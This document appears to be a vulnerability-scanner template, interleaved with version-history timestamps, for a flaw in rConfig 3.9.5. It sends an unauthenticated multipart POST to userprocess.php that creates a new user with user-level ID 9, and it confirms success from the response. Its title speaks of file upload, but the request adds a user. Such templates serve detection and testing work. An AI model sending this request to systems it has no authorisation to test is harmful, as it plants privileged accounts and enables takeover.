2020-10-15 17:26:11 +00:00
id : rconfig-rce
info :
2022-10-10 19:22:59 +00:00
name : rConfig 3.9.5 - Arbitrary File Upload
2020-10-15 17:26:11 +00:00
author : dwisiswant0
severity : high
2022-10-10 19:22:59 +00:00
description : rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cwe-id : CWE-434
2021-08-19 13:15:35 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- https://www.exploit-db.com/exploits/48878
2022-08-27 04:41:18 +00:00
tags : rconfig,rce,edb
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2020-10-15 17:26:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-10-15 17:26:11 +00:00
- raw :
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
2021-09-08 12:17:19 +00:00
Cookie : PHPSESSID={{randstr}}
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="username"
2021-09-08 12:17:19 +00:00
{{randstr}}
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="passconf"
Testing1@
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="password"
Testing1@
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="email"
2021-10-06 23:53:20 +00:00
test@{{randstr}}.tld
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="editid"
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="add"
add
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="ulevelid"
9
--01b28e152ee044338224bf647275f8eb--
matchers-condition : and
matchers :
- type : word
words :
2021-09-08 12:17:19 +00:00
- "User {{randstr}} successfully added to Database"
2020-10-15 17:26:11 +00:00
part : body
- type : status
status :
- 302